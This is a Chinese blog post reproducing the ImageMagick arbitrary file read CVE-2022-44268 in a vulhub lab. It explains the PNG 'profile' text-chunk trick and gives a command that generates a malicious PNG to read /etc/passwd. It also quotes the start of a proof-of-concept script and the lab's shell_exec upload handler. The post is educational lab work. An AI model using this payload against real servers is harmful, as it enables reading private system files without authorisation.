ImageMagick任意文件读取漏洞(CVE-2022-44268)

最新推荐文章于 2025-03-19 15:14:55 发布
最新推荐文章于 2025-03-19 15:14:55 发布
阅读量4.6k 收藏 10
点赞数 4
分类专栏: WEB 漏洞复现和分析 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_zzZ/article/details/128997219
版权

0x00 前提

前几天爆出一个 ImageMagick 漏洞 ,可以造成一个任意文件读取的危害比较可观,最近有时间来复现学习一下

主要是影响的范围很大,很多地方都有这个问题,需要来学习一下

0x01 介绍

ImageMagick 是一个免费的开源软件套件,用于显示、转换和编辑图像文件。它可以读取和写入 200 多种图像文件格式,因此在全球网站中找到它是很常见的,因为总是需要处理用户个人资料、目录等的图片。

在ImageMagick 7.1.0-51版本及以前

CVE-2022-44268:ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像(例如,调整大小)时,生成的图像可能嵌入了任意远程文件的内容(如果ImageMagick二进制文件有权读取它)。

0x02 漏洞介绍

CVE-2022-44268:任意远程泄露

当 ImageMagick 解析 PNG 文件时,例如在调整大小操作中,生成的图像可能嵌入了来自网站的任意远程文件的内容(如果 magick 二进制文件有权读取它)。

恶意行为者可以制作 PNG 或使用现有 PNG 并添加文本块类型(例如 tEXt)。这些类型具有关键字和文本字符串。如果关键字是字符串“profile”(不带引号),则 ImageMagick 会将文本字符串解释为文件名,并将内容加载为原始配置文件,然后攻击者可以下载随远程文件内容一起提供的调整大小的图像。

0x03 漏洞环境

问就是直接使用P牛的vulhub的环境,很方便。

执行如下命令启动一个Web服务器

docker-compose up -d

访问http://127.0.0.1:8080可以看到图片上传框

image-20230212160602851

[后端服务]https://github.com/vulhub/vulhub/blob/master/imagemagick/CVE-2022-44268/index.php

(直接看github即可)

功能是将用户上传的任意图片缩小成50x50的PNG图片。

$newname = uniqid() . '.png';
shell_exec("convert -resize 50x50 {$_FILES['file_upload']['tmp_name']} ./{$newname}");

0x04 漏洞复现

利用这个漏洞,需要先准备一个恶意PNG文件,文件内容中包含我们准备读取的文件路径:

可以使用poc.py来生成这个图片:

./poc.py generate -o poc.png -r /etc/passwd

https://github.com/vulhub/vulhub/blob/master/imagemagick/CVE-2022-44268/poc.py

#!/usr/bin/env python3
import sys
import png
import zlib
import argparse
import binascii
import logging

logging.basicConfig(stream=sys.stderr, level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
d = zlib.decompressobj()
e = zlib.compressobj()
IHDR = b'\x00\x00\x00\n\x00\x00\x00\n\x08\x02\x00\x00\x00'
IDAT = b'x\x9c\xbd\xcc\xa1\x11\xc0 \x0cF\xe1\xb4\x03D\x91\x8b&
最低0.47元/天 解锁文章
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)
qq_51577576的博客
03-13 1410
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)ImageMagick 7.1.0-51版本及以前存在CVE-2022-44268漏洞ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像(例如,调整大小)时,生成的图像可能嵌入了任意远程文件的内容(如果ImageMagick二进制文件有权读取它)。
ImageMagick任意文件读取(CVE-2022-44268)
qq_32445755的博客
03-23 662
ImageMagick是一个免费的创建、编辑、合成图片的软件。它可以读取、转换、写入多种格式的图片。ImageMagick的大多数功能的使用都来源于命令行工具。当 ImageMagick 解析 PNG 文件时,例如在调整大小操作中,生成的图像可能嵌入了来自网站的任意远程文件的内容(如果 magick 二进制文件有权读取它)。恶意行为者可以制作 PNG 或使用现有 PNG 并添加文本块类型(例如 tEXt)。这些类型具有关键字和文本字符串。
ImageMagick任意文件读取漏洞CVE-2022-44268)vulhub漏洞复现
qq_53003652的博客
07-31 699
ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。在ImageMagick 7.1.0-51版本及以前,其处理PNG文件的代码中存在一处功能,会导致转换图片时读取到当前操作系统上的任意文件,并将文件内容输出在图片内容中。访问ip:8080 有一个文件上传的页面,功能是将用户上传的任意图片缩小成50x50的PNG图片。4.使用poc.py读取下载的图片。5./etc/passwd读取成功。2.执行poc生成恶意图片。
Imagemagick 命令注入漏洞CVE-2016-3714)
最新发布
Palpitate_LL的博客
03-19 825
漏洞名称:Imagemagick 命令注入漏洞CVE-2016-3714)漏洞定级:高危漏洞描述:ImageMagick 在处理恶意构造的图片文件时,对于文件中的 URL 未经严格过滤,可导致命令注入漏洞。通过命令注入漏洞,黑客可以在服务器上执行任意系统命令,获取服务器权限。影响范围:ImageMagick 6.9.3-9本身及以前所有版本。
ImageMagick命令注入漏洞(CVE-2016–3714)复现笔记
u011975363的专栏
06-18 2857
学习资料 https://www.cnblogs.com/bmjoker/p/9898590.html https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html 漏洞原理 ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。 但有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。 国外的安全人员为此新建了一个网站:
漏洞复现】CVE-2022-44268 ImageMagick任意文件读取漏洞
m0_53121608的博客
07-13 442
漏洞复现】CVE-2022-44268 ImageMagick任意文件读取漏洞
ImageMagick命令注入漏洞(CVE-2016–3714)
HEAVEN569的博客
06-28 1325
震惊!!看图片也能中招!
ImageMagick
$firecat利白的代码足迹$
12-02 412
使用ImageMagick的创建,编辑,撰写,或转换位图图像。它可以读取和写入各种格式(超过200种)的图像,包括PNG,JPEG,GIF,HEIC,TIFF,DPX,EXR,WebP,Postscript,PDF和SVG。使用ImageMagick可以调整图像大小,翻转,镜像,旋转,变形,剪切和变换图像,调整图像颜色,应用各种特殊效果或绘制文本,线条,多边形,椭圆和贝塞尔曲线。 ImageMa...
wordpress ImageMagick漏洞
php小松
02-24 1039
最近服务重新安装了,结果阿里云检查wordprss有漏洞ImageMagick被爆高危漏洞 点阿里云的【立即修复】结果要钱, 网上找了修复方法,不知道有没有用 在 /wp-includes/media.php 的_wp_image_editor_choose 函数内部找到: $implementations = apply_filters( 'wp_image_editors', array(
热门开源软件ImageMagick中出现多个新漏洞
smellycat000的专栏
02-02 1677
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全研究员详述了开源软件 ImageMagick 中的两个漏洞详情,它们可导致拒绝服务和信息泄露后果。这两个漏洞是由拉美网络安全公司 etabase Q 在7.1.0-49版本中发现的,已在2022年11月发布的ImageMagick 7.1.0-52中修复。这两个漏洞CVE-2022-44267和CVE-2022-44268:前者是一个D...
深入浅析ImageMagick命令执行漏洞
12-23
00 前言 什么是ImageMagickImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等格式。使用它可以对图片进行切割、旋转、组合等多种特效的处理。 由于其功能强大、性能较好,并且对很多语言都有拓展支持,所以在程序开发中被广泛使用。许多网站开发者喜爱使用ImageMagick拓展来做web上的图片处理工作,比如用户头像生成、图片编辑等。 01 漏洞描述 ImageMagick是一款开源图片处理库,支持PHP、Ruby、NodeJS和Python等多种语言,使用非常广泛。包括PH
php imagemagick 漏洞,ImageMagick命令执行漏洞分析
weixin_39992483的博客
03-10 601
关于ImageMagickImageMagick是一个功能强大的开源图形处理软件,可以用来读、写和处理超过90种的图片文件,包括流行的JPEG、GIF、 PNG、PDF以及PhotoCD等格式。使用它可以对图片进行切割、旋转、组合等多种特效的处理。由于其功能强大、性能较好,并且对很多语言都有拓展支持,所以在程序开发中被广泛使用。许多网站开发者喜爱使用ImageMagick拓展来做web上的图片处理...
ImageMagick 命令注入漏洞 (CVE-2023-34153)
无问社区的博客
07-22 435
HVV开始了之后会更新部分相关的指南和总结,本文是漏洞的一个复现~
Imagemagick 命令注入漏洞 (CVE-2016–3714)
zzzzz1284的博客
01-09 317
CVE-2016–3714复现
复现cve-2022-44268
jjjj1029056414的博客
07-15 394
复现cve-2022-44268ImageMagick任意文件读取漏洞
ImageMagick介绍
chszs的专栏
12-03 3224
ImageMagick介绍ImageMagick (TM)是一个免费的创建、编辑、合成图片的软件。它可以读取、转换、写入多种格式的图片。图片切割、颜色替换、各种效果的应用,图片的旋转、组合,文本,直线,多边形,椭圆,曲线,附加到图片伸展旋转。ImageMagick是免费软件:全部源码开放,可以自由使用,复制,修改,发布。它遵守GPL许可协议。它可以运行于大多数的操作系统。ImageMagick的大
php imagemagick 漏洞,ImageMagick漏洞EXP简易生成脚本
weixin_39524425的博客
03-10 195
前几天看到爆出了关于ImageMagick的远程执行漏洞(CVE-2016-3714),所以为了Evil0x.COM核心成员使用,写了一个exp生成脚本供大家使用。(免责声明,出了事我不管)总体来说这个脚本有三个功能生成针对NC反弹生成针对bash反弹生成针对php反射服务端都可以使用nc侦听,会反弹shell。生成图片默认exp.png 后缀可以自由更改为其他的图片格式什么叫做shell反弹?r...
ImageMagick被爆高危漏洞
php小松
09-04 1091
昨天收到阿里云的漏洞报告邮件,邮件内容 ImageMagick被爆高危漏洞(CVE-2016-3714),此漏洞允许攻击者通过上传恶意构造的图像文件,在目标服务器执行任意代码。黑客可利用此类漏洞盗取权限窃取数据。由于ImageMagick应用十分广泛,目前已确定Wordpress等知名应用受此漏洞影响。 影响范围:  ImageMagick 当时没有在意,今天早上有收到百度发过来的邮件才开始注
CVE-2022-44268
09-01
CVE-2022-44268ImageMagick的一个漏洞,该漏洞可导致任意文件读取。根据提供的引用内容,可以找到相关的POC和代码示例来演示该漏洞的利用。由于该漏洞具有潜在的危害性,建议及时更新和修补受影响的ImageMagick版本以避免可能的攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-44268-POC.py](https://download.csdn.net/download/qq_51577576/87559843)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [ImageMagick任意文件读取漏洞(CVE-2022-44268)](https://blog.csdn.net/god_zzZ/article/details/128997219)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [ImageMagick任意文件读取漏洞CVE-2022-44268)vulhub漏洞复现](https://blog.csdn.net/qq_53003652/article/details/132019236)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值